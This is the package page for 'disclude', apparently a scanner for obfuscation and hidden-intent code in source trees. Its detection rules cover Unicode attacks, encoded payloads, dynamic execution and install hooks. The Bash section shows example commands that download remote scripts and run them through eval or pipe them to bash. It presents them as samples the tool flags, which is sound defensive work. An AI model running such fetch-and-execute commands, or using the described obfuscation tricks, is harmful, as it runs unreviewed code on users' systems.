Detect obfuscation in source code packages.
Project description
disclude
Scan a (C, Rust, Python, TypeScript, Bash/Shell) source tree for signs that code is hiding its intent from a human reader: Unicode attacks, encoded payloads, dynamic execution patterns, and build-time escape hatches. This is not a general purpose vulnerability scanner. This is a tool to surface the techniques used to make malicious code look benign on review.
Implemented in fast, multi-threaded Rust. Useful for humans, useful for AI agents: find areas for examination faster (and cheaper) than full code scans.
Install
pip install disclude
Usage
disclude scan <path> [options]
| Flag | Default | Description |
|---|---|---|
--format |
human |
Output format: human, json, sarif |
--severity |
warn |
Minimum severity to report: info, warn, critical |
--exit-code |
off | Exit 1 if any findings at or above threshold |
--diff <ref> |
— | Annotate findings introduced since a git ref (main, a tag, a SHA) |
--lang <lang> |
auto | Override language detection: python, rust, ts, js, c, bash/sh/shell |
--ignore <file> |
— | Additional ignore file (gitignore syntax) |
--no-raw |
— | Skip raw byte analysis |
--no-token |
— | Skip token-level analysis |
--no-ast |
— | Skip AST analysis (faster, less precise) |
Examples
# Human-readable report, warn and above
disclude scan ./my-package
# SARIF output for GitHub Code Scanning
disclude scan ./my-package --format sarif > results.sarif
# CI gate: fail if any critical finding
disclude scan ./my-package --severity critical --exit-code
# Review only what a PR introduced
disclude scan ./my-package --diff main --exit-code
Output formats
human: coloured terminal output grouped by file.
json: newline-delimited JSON, one object per file. Suitable for further processing.
sarif: SARIF 2.1.0, compatible with GitHub Code Scanning, VS Code SARIF viewer, and most CI platforms. Every signal kind appears in the rules catalog even if no findings were produced.
Languages
Language is detected from file extension or shebang line.
| Language | Extensions | Shebang |
|---|---|---|
| Bash/Shell | .sh, .bash, .bsh, .ksh, .zsh |
bash, sh, ksh, zsh |
| C | .c, .h |
— |
| Python | .py, .pyi |
python |
| Rust | .rs |
— |
| TypeScript | .ts, .tsx, .mts, .cts |
— |
| JavaScript | .js, .jsx, .mjs, .cjs |
node, deno, bun |
How it works
Each file passes through up to three analysis layers. Later layers refine earlier ones. For example, a base64 blob found in a comment is demoted to info by the token pass because encoded text in comments is common and low-risk.
Raw pass → byte-level: Unicode codepoints, encoded strings, entropy, line length
Token pass → language-aware: reclassify raw findings by context (identifier / string / comment),
emit identifier anomalies and string-concat patterns
AST pass → tree-sitter: function call patterns, build scripts, install hooks
Severity levels: critical (high confidence attack signal), warn (suspicious, review recommended), info (low confidence or expected in some legitimate code).
Checks
Unicode obfuscation
These run on every file regardless of language.
| Signal | Severity | Description |
|---|---|---|
unicode-bidi |
critical | Bidirectional control characters (U+202A–U+202E, U+2066–U+2069). The Trojan Source attack class — bidi overrides make code appear to do something different from what it compiles to. |
unicode-zero-width |
warn | Zero-width characters (U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+00AD soft hyphen, U+FEFF BOM outside file start). Can silently change identifier names or inject hidden content. |
unicode-invisible |
warn | Characters from the Unicode Tags block (U+E0001 LANGUAGE TAG; U+E0020–U+E007F). These are invisible in all common renderers and have no legitimate use in source code. Used in IOCCC 2024 "salmon" to attach invisible suffixes to macro names, making identifiers silently different from what they appear. Demoted to info when found inside string literals or comments. |
unicode-mixed-script |
warn | Identifier contains characters from more than one Unicode script (e.g. Cyrillic + Latin). Demoted to info inside strings/comments. |
unicode-homoglyph |
warn | Identifier contains characters that are visually indistinguishable from a different ASCII character (e.g. Cyrillic а vs Latin a). Demoted to info inside strings/comments. |
Surrogate escape sequences
Applies to JavaScript and TypeScript string literals only.
| Signal | Severity | Description |
|---|---|---|
unicode-surrogate |
warn / info | \uHHHH escape sequences forming UTF-16 surrogate pairs. JavaScript runtimes recombine adjacent surrogate pairs at runtime — a pair such as evaluates to U+E0041 (TAG LATIN CAPITAL LETTER A), an invisible tag character. Warn when the decoded codepoint is a Tags block character; info for other surrogate pairs (e.g. emoji written as 😀) or orphaned surrogates. |
Encoded payloads
These run on every file regardless of language.
| Signal | Severity | Description |
|---|---|---|
encoding-base64 |
warn | Base64-shaped blob in a string literal. Threshold: ≥64 chars for unpadded blobs; ≥40 chars when the blob ends with = or == padding (padding is definitive proof of base64 encoding, ruling out hex digests and identifiers). Often used to embed payloads or C2 URLs that are decoded and requested at runtime. Demoted to info outside string literals. |
encoding-hex |
warn | Long run of \xNN hex escape sequences in a string literal. A common way to embed shellcode or obfuscated text. Demoted to info outside string literals. |
encoding-octal |
warn | Long run of \NNN octal escape sequences (≥6 consecutive, minimum entropy 2.5 bits/byte). Octal is less recognizable than hex and valid in C, Python, and JavaScript — used to encode arbitrary bytes or hide printable characters (\101 for A, \012 for newline). Demoted to info outside string literals. |
encoding-escape-soup |
warn | Dense mix of arbitrary escape sequences. Indicates content that has been serialized or obfuscated to avoid plain-text grep. |
Code structure anomalies
These run on every file regardless of language.
| Signal | Severity | Description |
|---|---|---|
high-complexity |
warn | String literal with unusually high Shannon entropy (high compression ratio). Raw high-entropy data in source is often an encoded payload or embedded binary. |
long-line |
info | Line length exceeds threshold in a file that is not a minified bundle. Lines dominated (>80%) by string/comment content are suppressed — the signal targets long code lines, which are a common obfuscation tactic. |
whitespace-anomaly |
warn | Unusual whitespace in indentation (e.g. mixed tabs/spaces, non-standard whitespace characters), or — for C — decorative internal whitespace layout where ≥ 30 % of lines have ≥ 2 runs of ≥ 4 spaces between code tokens. The decorative trigger catches IOCCC-style code that has been padded into rectangles, diamonds, or other visual shapes. Two structural-alignment filters suppress switch/case tables (one starting keyword dominates) and column-aligned data arrays (run-start columns cluster at a few fixed positions). |
narrow-file-charset |
warn | The file's entire printable non-whitespace character vocabulary fits within ≤ 12 distinct ASCII characters (minimum 200 bytes of content). JSFuck uses exactly 6 characters (!()+[]) to encode arbitrary JavaScript using type coercion — the resulting file has no readable identifiers, strings, or keywords. The message names the characters found. |
Identifier anomalies
Token pass; language-aware.
| Signal | Severity | Description |
|---|---|---|
identifier-narrow-charset |
warn | Identifier composed entirely of visually confusable characters (l, I, 1, O, 0). Names like lI1O0lI are unreadable by design. |
identifier-low-length |
info | File-wide naming-shape signal. Fires when the mean non-conventional identifier length is below 2.0 over at least 20 identifiers, or when ≥ 40 % of non-conventional identifiers are exactly one character (over at least 30 identifiers). The second trigger catches IOCCC-style obfuscation where a sprinkling of long keywords (extern, nanosleep, TIOCGWINSZ) inflates the mean above 2.0 even though most globals and functions are single letters. |
string-concat-construction |
warn | String concatenation that reconstructs a sensitive identifier (exec, eval, import, getattr, system, require, etc.). A common pattern to dodge static keyword grep. |
Dynamic execution — Python
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
dynamic-execution |
critical / warn | exec() or eval() called with a non-literal argument (critical), or with a literal (warn). Also fires when compile() is reached by a decoded value. |
dynamic-import |
warn | __import__() or importlib.import_module() called with a non-literal specifier. |
dynamic-attribute |
warn | getattr(obj, name) where name is not a string literal — runtime-resolved attribute lookup. |
Dynamic execution — TypeScript / JavaScript
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
dynamic-execution |
critical / warn / info | eval(), new Function(), or setTimeout/setInterval called with a string argument (critical/warn). atob(x) — base64 decode at runtime (warn); the first step of the classic supply-chain pattern: store C2 URL or payload as a base64 literal, decode it, then fetch or exec. btoa(x) — base64 encode at runtime (info); used in exfiltration patterns. |
dynamic-import |
warn | require(expr) where expr is not a string literal, or import(`...${expr}...`) template. |
dynamic-attribute |
warn | process.binding(name) — Node.js internal binding escape hatch, reaches C++ internals not exposed through the public API. |
Dynamic execution — Bash/Shell
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
dynamic-execution |
critical / warn | eval called with a dynamic argument — variable expansion (eval "$VAR"), command substitution (eval $(cmd)), or a word containing variable references (critical). eval called with a plain string literal (warn). Also fires when exec is called with a variable as the binary path (exec $cmd), since the executed binary is unknown statically (critical). |
dynamic-import |
warn | source $path or . $path where the path contains a variable — the sourced file is determined at runtime. |
dynamic-execution (pipeline) |
warn | A pipeline ending with bash, sh, ksh, or zsh — the classic "pipe to shell" dropper pattern (curl … | bash). Downloads and immediately executes arbitrary code without inspection. |
Examples:
# CRITICAL — dynamic value reaches eval
PAYLOAD=$(curl -s https://example.com/update.sh)
eval "$PAYLOAD"
# CRITICAL — exec with variable binary path
exec $USER_SUPPLIED_BIN
# WARN — source with variable path
source $CONFIG_DIR/init.sh
# WARN — classic pipe-to-shell dropper
curl -fsSL https://example.com/install.sh | bash
Dynamic execution — C
AST pass; tree-sitter.
| Signal | Severity | Description |
|---|---|---|
dynamic-execution |
critical / warn | system(cmd) or exec*(path, ...) (execl, execlp, execle, execv, execvp, execve) or popen(cmd, mode). Critical when the argument is a variable; warn when it is a string literal. |
dynamic-import |
warn | dlopen(path, flags) with a non-literal path — dynamically loads a shared library. |
dynamic-attribute |
warn | dlsym(handle, name) with a non-literal symbol name — resolves a function pointer by name at runtime. |
C-specific obfuscation
| Signal | Severity | Description |
|---|---|---|
macro-alias |
warn | Token pass. #define <name> <replacement> where the macro name is 1–2 characters and the replacement is a sensitive identifier (write, read, open, system, exec*, popen, fork, kill, ptrace, syscall, dlopen, dlsym, mmap, mprotect, socket, connect, send, recv, …). A common dropper trick: the syscall is renamed to a single letter so that simple keyword grep over the source misses it. Function-like macros and multi-token bodies are excluded. |
macro-keyword-override |
warn | Token pass. #define <keyword> <body> where <keyword> is a reserved pre-C11 keyword (int, char, double, union, for, return, …) and the replacement body is non-empty. Rebinding a keyword silently changes what every later occurrence in the file means — an IOCCC favourite (#define double(a,b) int, #define union static struct). C11+ pseudo-keywords (_Static_assert, _Generic, _Atomic, _Alignas, _Alignof, _Thread_local, _Noreturn) are excluded because real codebases routinely polyfill them. Empty-body shims (#define inline) are excluded. |
identifier-confusable-collision |
warn | Token pass. Two distinct identifiers in the same file collapse to the same visual skeleton after grouping confusable characters — round-O 0/O/o and vertical-stroke 1/l/I (lowercase i is excluded; its dot makes it visually distinct). Fires only when at least one position differs as digit-vs-letter (_0 vs _O, x0 vs xO); pure case-pair collisions like Object/object are excluded as a common C convention rather than the IOCCC digit-letter swap. |
numeric-literal-payload |
critical | AST pass. A wide-numeric array (≥ 8 elements of short, int, long, long long, float, double, long double, wchar_t, size_t, int16_t/int32_t/int64_t, uint16_t/uint32_t/uint64_t, intptr_t, uintptr_t, …) that is later reinterpreted through a byte-pointer cast (char *, unsigned char *, signed char *, int8_t *, uint8_t *). Hides arbitrary bytes inside what looks like a table of floating-point or integer constants. Findings are deduped per array — one report per array citing the cast count. |
format-string-write |
critical | Token pass. printf-family format string contains a %n write directive (%n, %hhn, %hn, %ln, %lln, with optional positional %<digit>$…n). The n conversion writes the byte-count-so-far into an int * argument — a memory write primitive seen almost exclusively in CTF/exploit code and IOCCC entries. Detected inside string literals and inside #define macro bodies (catches the IOCCC stringification trick #define N(a) "%"#a"$hhn", where the $hhn directive tail is split across stringification). Comments mentioning %n are excluded — both standalone and embedded /* ... */ / // ... inside #define lines. |
legacy-k-and-r-main |
warn | AST pass. main() defined without an explicit return type — pre-ANSI K&R style (main() { ... } or main(argc, argv) int argc; char **argv; { ... }). Modern C requires int main(...); the implicit-int form is undefined behaviour in C99+ and is a strong indicator of intentionally archaic source (IOCCC entries) or pre-1989 code. |
implicit-int-function |
warn | AST pass. Three or more functions in the same file are defined without an explicit return type (pre-ANSI K&R implicit-int). Catches IOCCC sources where every function is shaped Q(a){return a;}. The single-function main() form is reported by legacy-k-and-r-main; this signal is the file-wide pattern. |
dynamic-format-string |
warn | AST pass. A printf-family call (printf, fprintf, dprintf, sprintf, snprintf, asprintf, and the w-wide variants) uses a non-literal format string — the classic format-string-bug shape. The v* variadic forwarders are excluded by design. Bare-identifier format args that resolve to a parameter or local variable of the enclosing function are excluded (legitimate format selection). SCREAMING_SNAKE_CASE names are treated as macro-defined formats and excluded, as are i18n wrappers (_(...), gettext(...), dgettext, ngettext, …). |
embedded-nul-in-string |
warn | Token pass. A C string literal contains an embedded NUL escape (\0, \00, \000, \x00) followed by additional non-whitespace bytes. libc string functions truncate at the NUL while the trailing bytes remain accessible through memcpy/length-bearing APIs — a stealth payload pattern, and an IOCCC technique for stuffing extra data into a string that still looks short. |
reverse-subscript-notation |
warn | AST pass. Two shapes of the C a[b] ≡ b[a] trick: (1) a subscript_expression whose left operand is a numeric literal (2[arr] instead of arr[2]) — caught directly when the surrounding parse is clean; (2) a #define <name> [<expr>] macro whose body is a bare bracketed fragment, used to splice a reverse subscript at every call site (#define q [v+a] → 2 q ⇒ 2[v+a]). Real code essentially never indexes a pointer with the integer on the left. Subscripts inside ERROR parser-recovery contexts are excluded. |
recursive-main-call |
warn | AST pass. main is called from inside another function in the same TU — recursion through main is an IOCCC pattern (loop using argc/argv to thread state). The runtime is the only legitimate caller of main. The K&R main() { ... } definition shape (where tree-sitter wraps the bare signature in an ERROR containing a call_expression) is excluded so the implicit-int main definition isn't misread as a self-call. |
stringify-dereference |
warn | AST pass. A function-like macro body contains *#param — the # operator stringifies the macro argument into a string literal, and the leading * dereferences it to extract the first byte. A one-character literal extraction trick used in IOCCC code (e.g. *c == *#v to compare a runtime char against the first letter of a macro-arg token). Token paste ## is excluded. |
Build-time and install-time
AST pass; language-specific.
| Signal | Severity | Description |
|---|---|---|
build-script-shellout |
critical | Rust build.rs spawns a shell command or makes a network request at compile time. Malicious build scripts are a known supply-chain vector — they run automatically during cargo build. Also elevated to critical when found alongside unsafe code in the same file. |
proc-macro-presence |
info | Rust crate defines a procedural macro (proc-macro = true). Proc-macros run arbitrary code at compile time with full access to the compiler. Informational — legitimate proc-macros are common, but they warrant extra scrutiny in untrusted dependencies. |
install-hook-shellout |
warn | package.json preinstall/postinstall/install script shells out to a non-trivial command. Runs automatically on npm install. |
What is New
1.2.0
Updates to the public interface.
1.1.0
Updates to the public interface.
1.0.0
Initial release.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distributions
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file disclude-1.2.0.tar.gz.
File metadata
- Download URL: disclude-1.2.0.tar.gz
- Upload date:
- Size: 25.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
708d7f960c82afa84ec383e65149009fc8e6efca320799e870d2ddc8eb973ae6
|
|
| MD5 |
a9305435dae59c56cd245a478ffdd599
|
|
| BLAKE2b-256 |
a858fef3e244c5bb5d2d5fde0b28ebdbc593ba71a3406909485fbff89d25e1bc
|
File details
Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
- Upload date:
- Size: 2.5 MB
- Tags: CPython 3.9+, manylinux: glibc 2.17+ x86-64
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
17059a7b23ecf0f2d68a2b8df488ad1d1a5e0bb840d21a943c849d94740a4606
|
|
| MD5 |
fb27f3721e492e0e86510d3929ca2807
|
|
| BLAKE2b-256 |
32b1d90d67ef78a6e10bfdb7ebc49962e7894d16d19c13b2085f068956a86155
|
File details
Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl
- Upload date:
- Size: 2.6 MB
- Tags: CPython 3.9+, manylinux: glibc 2.17+ s390x
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
5301ec428b1bab46baee8983af355da20ec867f2c304daed66549b325faf29d9
|
|
| MD5 |
6f3db587820c9c55aeddcb63b998be56
|
|
| BLAKE2b-256 |
2dfff5576d1915e2454bbd29534f2f925e1a755976e7e8e1c10c271894dcb52c
|
File details
Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl
- Upload date:
- Size: 2.8 MB
- Tags: CPython 3.9+, manylinux: glibc 2.17+ ppc64le
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
c5935bc96692b401ad57faf3a5bef1e76f1986df87e3678c1f3a1dc8540782c6
|
|
| MD5 |
e4424bcc8f0d300c2345de3b7cc49491
|
|
| BLAKE2b-256 |
17834384a0d7e664d49cb65e891ff08398b3ac14e464fb22b1930e837d398d85
|
File details
Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl
- Upload date:
- Size: 2.6 MB
- Tags: CPython 3.9+, manylinux: glibc 2.17+ i686
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
e5859142011679a39d1786f39f74163b69141e52fb1aa8c73c2a62803082596d
|
|
| MD5 |
fa7e5acd594b2bd17bcf5d59c5ff6378
|
|
| BLAKE2b-256 |
a9348ed5cff5a2254b23c7d7c57137d64b289ee58d6f07e424f3f979b89d5aca
|
File details
Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl
- Upload date:
- Size: 2.4 MB
- Tags: CPython 3.9+, manylinux: glibc 2.17+ ARMv7l
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
26d4deeae950e72419722aec62bce4871a1b72095e09960988ec5dbcb68b4519
|
|
| MD5 |
15dc9140e0ca9f668491934193c0008c
|
|
| BLAKE2b-256 |
4c22ba8dae51c623ef93dc0a5a65bec19bdc067c9f9c908292b91c190ea2f0e4
|
File details
Details for the file disclude-1.2.0-cp39-abi3-macosx_11_0_arm64.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-macosx_11_0_arm64.whl
- Upload date:
- Size: 2.3 MB
- Tags: CPython 3.9+, macOS 11.0+ ARM64
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
451540953746b63f2f202babbc75292970483959642959e57703d3e1553fed6e
|
|
| MD5 |
8e1c76de24619dd7308bf44b60e28130
|
|
| BLAKE2b-256 |
bd79d9f857ce2ebec9013546dead03cd6eb8ff707fc1a9a98b409c93e257f406
|
File details
Details for the file disclude-1.2.0-cp39-abi3-macosx_10_12_x86_64.whl.
File metadata
- Download URL: disclude-1.2.0-cp39-abi3-macosx_10_12_x86_64.whl
- Upload date:
- Size: 2.3 MB
- Tags: CPython 3.9+, macOS 10.12+ x86-64
- Uploaded using Trusted Publishing? No
- Uploaded via: maturin/1.13.1
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
3ba93d93219883252a1763b64d809a06bed6e2b95d92528761b1334f3cc0cc77
|
|
| MD5 |
80ea7c8975a45f0b099b0ae6c77037c4
|
|
| BLAKE2b-256 |
3b4c86021a8ae2b7d968b1cca2e9244be0ed0df2582482c4eb4aa27f92482511
|